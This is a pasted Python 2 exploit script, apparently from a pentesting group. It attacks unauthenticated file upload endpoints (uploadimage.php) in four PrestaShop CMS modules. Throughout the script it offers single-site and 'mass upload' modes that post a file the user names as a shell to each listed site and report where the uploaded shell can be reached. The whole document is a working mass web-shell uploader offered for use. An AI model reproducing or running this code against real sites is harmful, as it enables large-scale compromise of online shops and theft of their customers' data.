SHOW:
|
|
- or go back to the newest paste.
| 1 | #!/usr/bin/python | |
| 2 | #################################################################################### | |
| 3 | #Author : PentesterDesk | |
| 4 | #Date : 20-June-2016 | |
| 5 | #Software: Prestashop CMS | |
| 6 | #vuln Mod: Simpleslideshow , productpageadverts , Homepageadvertise , columnadverts | |
| 7 | #################################################################################### | |
| 8 | import sys, os | |
| 9 | import time | |
| 10 | import requests | |
| 11 | def main(): | |
| 12 | os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
| |
| 13 | ||
| 14 | banner = ''' | |
| 15 | ||
| 16 | +======================================================+ | |
| 17 | | Prestashop | FileUpload Exp | PentesterDesk | | |
| 18 | | Found by : Muhammad Faisal Gunanda | | |
| 19 | | Coded by : PentesterDesk Team | | |
| 20 | | Contact : pentesterdesk@gmail.com | | |
| 21 | +======================================================+ | |
| 22 | ''' | |
| 23 | print banner | |
| 24 | print "[1] SimpleSlideShow " | |
| 25 | print "[2] Productpageadverts" | |
| 26 | print "[3] HomepageAdvertise" | |
| 27 | print "[4] columnAdverts" | |
| 28 | ch1=raw_input("\n[>] ")
| |
| 29 | #1 SimpleSlideShow | |
| 30 | if ch1 == '1': | |
| 31 | os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
| |
| 32 | print banner | |
| 33 | print "\n <==============SimpleSlideShow Exploit=================>\n" | |
| 34 | print "[1] Single Site " | |
| 35 | print "[2] Mass Upload" | |
| 36 | print "[3] GoTo Home" | |
| 37 | ch2=raw_input("\n[>] ")
| |
| 38 | if ch2 == '3': | |
| 39 | main() | |
| 40 | if ch2 == '1': | |
| 41 | os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
| |
| 42 | print banner | |
| 43 | print "\n <==============SimpleSlideShow Exploit=================>\n" | |
| 44 | url = raw_input("[+] Enter Url : ")
| |
| 45 | filname= raw_input("[+] Enter File : ")
| |
| 46 | if filname == '' or url == '': | |
| 47 | print "\n[!] Url or File is not entered\n" | |
| 48 | raw_input("[+] Enter Any key to try agian [>] ")
| |
| 49 | main() | |
| 50 | #url Logic | |
| 51 | if '/modules/simpleslideshow/' in url: | |
| 52 | url=url.replace('/modules/simpleslideshow/','/modules/simpleslideshow/uploadimage.php')
| |
| 53 | elif '/modules/simpleslideshow/uploadimage.php' in url: | |
| 54 | url=url | |
| 55 | else: | |
| 56 | url = url + "/modules/simpleslideshow/uploadimage.php" | |
| 57 | #main | |
| 58 | files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
| |
| 59 | req=requests.post(url,files=files) | |
| 60 | if req.status_code == 200 or 'success' in req.text: | |
| 61 | url=url.replace('/uploadimage.php','/slides/'+filname)
| |
| 62 | print ("[+] %s [ok]" % (url))
| |
| 63 | else: | |
| 64 | print "\n[+] %s \n" %url | |
| 65 | raw_input("\n[+] Press Enter [>] ")
| |
| 66 | main() | |
| 67 | #Mass upload Logic | |
| 68 | if ch2 == '2': | |
| 69 | os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
| |
| 70 | print banner | |
| 71 | print "\n <==============SimpleSlideShow Exploit=================>\n" | |
| 72 | filee = raw_input("[+] Enter List Name : ")
| |
| 73 | filname= raw_input("[+] Enter Shell Name : ")
| |
| 74 | if filname == '' or filee == '': | |
| 75 | print "\n[!] Url or File is not entered\n" | |
| 76 | raw_input("[+] Enter Any key to try agian [>] ")
| |
| 77 | main() | |
| 78 | ob = open(filee,'r') | |
| 79 | lists = ob.readlines() | |
| 80 | list1 = [] | |
| 81 | i = 0 | |
| 82 | for i in range(len(lists)): | |
| 83 | list1.append(lists[i].strip('\n'))
| |
| 84 | ||
| 85 | count = 0 | |
| 86 | for site in (list1): | |
| 87 | count = count + 1 | |
| 88 | if '/modules/simpleslideshow/' in site: | |
| 89 | url=site.replace('/modules/simpleslideshow/','/modules/simpleslideshow/uploadimage.php')
| |
| 90 | elif '/modules/simpleslideshow/uploadimage.php' in site: | |
| 91 | url=site | |
| 92 | else: | |
| 93 | url = site + "/modules/simpleslideshow/uploadimage.php" | |
| 94 | files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
| |
| 95 | req=requests.post(url,files=files) | |
| 96 | if req.status_code == 200 or 'success' in req.text: | |
| 97 | url=url.replace('/uploadimage.php','/slides/'+filname)
| |
| 98 | print ("[%d] %s [ ok ]" % (count,url))
| |
| 99 | else: | |
| 100 | print ("[%d] %s " % (count,url))
| |
| 101 | raw_input("\n[+] Press Enter [>] ")
| |
| 102 | main() | |
| 103 | ||
| 104 | #2 productpageadverts | |
| 105 | if ch1 == '2': | |
| 106 | os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
| |
| 107 | print banner | |
| 108 | print "\n <==============Productpageadverts Exploit==============>\n" | |
| 109 | print "[1] Single Site " | |
| 110 | print "[2] Mass Upload" | |
| 111 | print "[3] GoTo Home" | |
| 112 | ch2=raw_input("\n[>] ")
| |
| 113 | if ch2 == '3': | |
| 114 | main() | |
| 115 | if ch2 == '1': | |
| 116 | os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
| |
| 117 | print banner | |
| 118 | print "\n <==============Productpageadverts Exploit==============>\n" | |
| 119 | url = raw_input("[+] Enter Url : ")
| |
| 120 | filname= raw_input("[+] Enter File : ")
| |
| 121 | if filname == '' or url == '': | |
| 122 | print "\n[!] Url or File is not entered\n" | |
| 123 | raw_input("[+] Enter Any key to try agian [>] ")
| |
| 124 | main() | |
| 125 | #url Logic | |
| 126 | if '/modules/productpageadverts/' in url: | |
| 127 | url=url.replace('/modules/productpageadverts/','/modules/productpageadverts/uploadimage.php')
| |
| 128 | elif '/modules/productpageadverts/uploadimage.php' in url: | |
| 129 | url=url | |
| 130 | else: | |
| 131 | url = url + "/modules/productpageadverts/uploadimage.php" | |
| 132 | #main | |
| 133 | files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
| |
| 134 | req=requests.post(url,files=files) | |
| 135 | if req.status_code == 200 or 'success' in req.text: | |
| 136 | url=url.replace('/uploadimage.php','/slides/'+filname)
| |
| 137 | print ("[+] %s [ ok ]" % (url))
| |
| 138 | else: | |
| 139 | print "\n\[+] %s \n" %url | |
| 140 | raw_input("\n[+] Press Enter [>] ")
| |
| 141 | main() | |
| 142 | #Mass upload Logic | |
| 143 | if ch2 == '2': | |
| 144 | os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
| |
| 145 | print banner | |
| 146 | print "\n <==============Productpageadverts Exploit==============>\n" | |
| 147 | filee = raw_input("\033[1;36m[+] Enter List Name : \033[1;m")
| |
| 148 | filname= raw_input("\033[1;36m[+] Enter Shell Name : \033[1;m")
| |
| 149 | if filname == '' or filee == '': | |
| 150 | print "\n\033[1;41m[!] Url or File is not entered\033[1;m\n" | |
| 151 | raw_input("\033[1;36m[+] Enter Any key to try agian \033[1;m[\033[1;31m>\033[1;m] ")
| |
| 152 | main() | |
| 153 | ob = open(filee,'r') | |
| 154 | lists = ob.readlines() | |
| 155 | list1 = [] | |
| 156 | i = 0 | |
| 157 | for i in range(len(lists)): | |
| 158 | list1.append(lists[i].strip('\n'))
| |
| 159 | ||
| 160 | count = 0 | |
| 161 | for site in (list1): | |
| 162 | count = count + 1 | |
| 163 | if '/modules/productpageadverts/' in site: | |
| 164 | url=site.replace('/modules/productpageadverts/','/modules/productpageadverts/uploadimage.php')
| |
| 165 | elif '/modules/simpleslideshow/uploadimage.php' in site: | |
| 166 | url=site | |
| 167 | else: | |
| 168 | url = site + "/modules/productpageadverts/uploadimage.php" | |
| 169 | files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
| |
| 170 | req=requests.post(url,files=files) | |
| 171 | if req.status_code == 200 or 'success' in req.text: | |
| 172 | url=url.replace('/uploadimage.php','/slides/'+filname)
| |
| 173 | print ("[%d] %s [ ok ]" % (count,url))
| |
| 174 | else: | |
| 175 | print ("[%d] %s " % (count,url))
| |
| 176 | raw_input("\n[+] Press Enter [>] ")
| |
| 177 | main() | |
| 178 | #3 homepageadvertise | |
| 179 | if ch1 == '3': | |
| 180 | os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
| |
| 181 | print banner | |
| 182 | print "\n <==============HomePageAdvertise Exploit===============>\n" | |
| 183 | print "[1] Single Site " | |
| 184 | print "[2] Mass Upload" | |
| 185 | print "[3] GoTo Home" | |
| 186 | ch2=raw_input("\n[>] ")
| |
| 187 | if ch2 == '3': | |
| 188 | main() | |
| 189 | if ch2 == '1': | |
| 190 | os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
| |
| 191 | print banner | |
| 192 | print "\n <==============HomePageAdvertise Exploit===============>\n" | |
| 193 | url = raw_input("[+] Enter Url : ")
| |
| 194 | filname= raw_input("[+] Enter File : ")
| |
| 195 | if filname == '' or url == '': | |
| 196 | print "\n\033[1;41m[!] Url or File is not entered\033[1;m\n" | |
| 197 | raw_input("\033[1;36m[+] Enter Any key to try agian \033[1;m[\033[1;31m>\033[1;m] ")
| |
| 198 | main() | |
| 199 | #url Logic | |
| 200 | if '/modules/homepageadvertise/' in url: | |
| 201 | url=url.replace('/modules/homepageadvertise/','/modules/homepageadvertise/uploadimage.php')
| |
| 202 | elif '/modules/homepageadvertise/uploadimage.php' in url: | |
| 203 | url=url | |
| 204 | else: | |
| 205 | url = url + "/modules/homepageadvertise/uploadimage.php" | |
| 206 | #main | |
| 207 | files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
| |
| 208 | req=requests.post(url,files=files) | |
| 209 | if req.status_code == 200 or 'success' in req.text: | |
| 210 | url=url.replace('/uploadimage.php','/slides/'+filname)
| |
| 211 | print ("[+] %s [ ok ]" % (url))
| |
| 212 | else: | |
| 213 | print "\n[+] %s \n" %url | |
| 214 | raw_input("\n[+] Press Enter [>] ")
| |
| 215 | main() | |
| 216 | #Mass upload Logic | |
| 217 | if ch2 == '2': | |
| 218 | os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
| |
| 219 | print banner | |
| 220 | print "\n <==============HomePageAdvertise Exploit===============>\n" | |
| 221 | filee = raw_input("[+] Enter List Name : ")
| |
| 222 | filname= raw_input("[+] Enter Shell Name : ")
| |
| 223 | if filname == '' or filee == '': | |
| 224 | print "\n\[!] Url or File is not entered\n" | |
| 225 | raw_input("[+] Enter Any key to try agian [>] ")
| |
| 226 | main() | |
| 227 | ob = open(filee,'r') | |
| 228 | lists = ob.readlines() | |
| 229 | list1 = [] | |
| 230 | i = 0 | |
| 231 | for i in range(len(lists)): | |
| 232 | list1.append(lists[i].strip('\n'))
| |
| 233 | ||
| 234 | count = 0 | |
| 235 | for site in (list1): | |
| 236 | count = count + 1 | |
| 237 | if '/modules/homepageadvertise/' in site: | |
| 238 | url=site.replace('/modules/homepageadvertise/','/modules/homepageadvertise/uploadimage.php')
| |
| 239 | elif '/modules/homepageadvertise/uploadimage.php' in site: | |
| 240 | url=site | |
| 241 | else: | |
| 242 | url = site + "/modules/homepageadvertise/uploadimage.php" | |
| 243 | files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
| |
| 244 | req=requests.post(url,files=files) | |
| 245 | if req.status_code == 200 or 'success' in req.text: | |
| 246 | url=url.replace('/uploadimage.php','/slides/'+filname)
| |
| 247 | print ("[%d]] %s [ ok ]" % (count,url))
| |
| 248 | else: | |
| 249 | print ("[%d] %s " % (count,url))
| |
| 250 | raw_input("\n[+] Press Enter [>] ")
| |
| 251 | main() | |
| 252 | #4 columnadverts | |
| 253 | if ch1 == '4': | |
| 254 | os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
| |
| 255 | print banner | |
| 256 | print "\n <================ColumnAdvers Exploit==================>\n" | |
| 257 | print "[1] Single Site " | |
| 258 | print "[2] Mass Upload" | |
| 259 | print "[3] GoTo Home" | |
| 260 | ch2=raw_input("\n[>] ")
| |
| 261 | if ch2 == '3': | |
| 262 | main() | |
| 263 | if ch2 == '1': | |
| 264 | os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
| |
| 265 | print banner | |
| 266 | print "\n <================ColumnAdvers Exploit==================>\n" | |
| 267 | url = raw_input("[+] Enter Url : ")
| |
| 268 | filname= raw_input("[+] Enter File : ")
| |
| 269 | if filname == '' or url == '': | |
| 270 | print "\n[!] Url or File is not entered\n" | |
| 271 | raw_input("[+] Enter Any key to try agian [>] ")
| |
| 272 | main() | |
| 273 | #url Logic | |
| 274 | if '/modules/columnadverts/' in url: | |
| 275 | url=url.replace('/modules/columnadverts/','/modules/columnadverts/uploadimage.php')
| |
| 276 | elif '/modules/columnadverts/uploadimage.php' in url: | |
| 277 | url=url | |
| 278 | else: | |
| 279 | url = url + "/modules/columnadverts/uploadimage.php" | |
| 280 | #main | |
| 281 | files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
| |
| 282 | req=requests.post(url,files=files) | |
| 283 | if req.status_code == 200 or 'success' in req.text: | |
| 284 | url=url.replace('/uploadimage.php','/slides/'+filname)
| |
| 285 | print ("[+] %s [ ok ]" % (url))
| |
| 286 | else: | |
| 287 | print "\n[+] %s \n" %url | |
| 288 | raw_input("\n[+] Press Enter [>] ")
| |
| 289 | main() | |
| 290 | #Mass upload Logic | |
| 291 | if ch2 == '2': | |
| 292 | os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
| |
| 293 | print banner | |
| 294 | print "\n <================ColumnAdvers Exploit==================>\n" | |
| 295 | filee = raw_input("[+] Enter List Name : ")
| |
| 296 | filname= raw_input("[+] Enter Shell Name : ")
| |
| 297 | if filname == '' or filee == '': | |
| 298 | print "\n[!] Url or File is not entered\n" | |
| 299 | raw_input("[+] Enter Any key to try agian [>] ")
| |
| 300 | main() | |
| 301 | ob = open(filee,'r') | |
| 302 | lists = ob.readlines() | |
| 303 | list1 = [] | |
| 304 | i = 0 | |
| 305 | for i in range(len(lists)): | |
| 306 | list1.append(lists[i].strip('\n'))
| |
| 307 | ||
| 308 | count = 0 | |
| 309 | for site in (list1): | |
| 310 | count = count + 1 | |
| 311 | if '/modules/columnadverts/' in site: | |
| 312 | url=site.replace('/modules/columnadverts/','/modules/columnadverts/uploadimage.php')
| |
| 313 | elif '/modules/columnadverts/uploadimage.php' in site: | |
| 314 | url=site | |
| 315 | else: | |
| 316 | url = site + "/modules/columnadverts/uploadimage.php" | |
| 317 | files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
| |
| 318 | req=requests.post(url,files=files) | |
| 319 | if req.status_code == 200 or 'success' in req.text: | |
| 320 | url=url.replace('/uploadimage.php','/slides/'+filname)
| |
| 321 | print ("[%d] %s [ ok ]" % (count,url))
| |
| 322 | else: | |
| 323 | print ("[%d] %s " % (count,url))
| |
| 324 | raw_input("\n[+] Press Enter [>] ")
| |
| 325 | main() | |
| 326 | if __name__ == "__main__": | |
| 327 | main() |
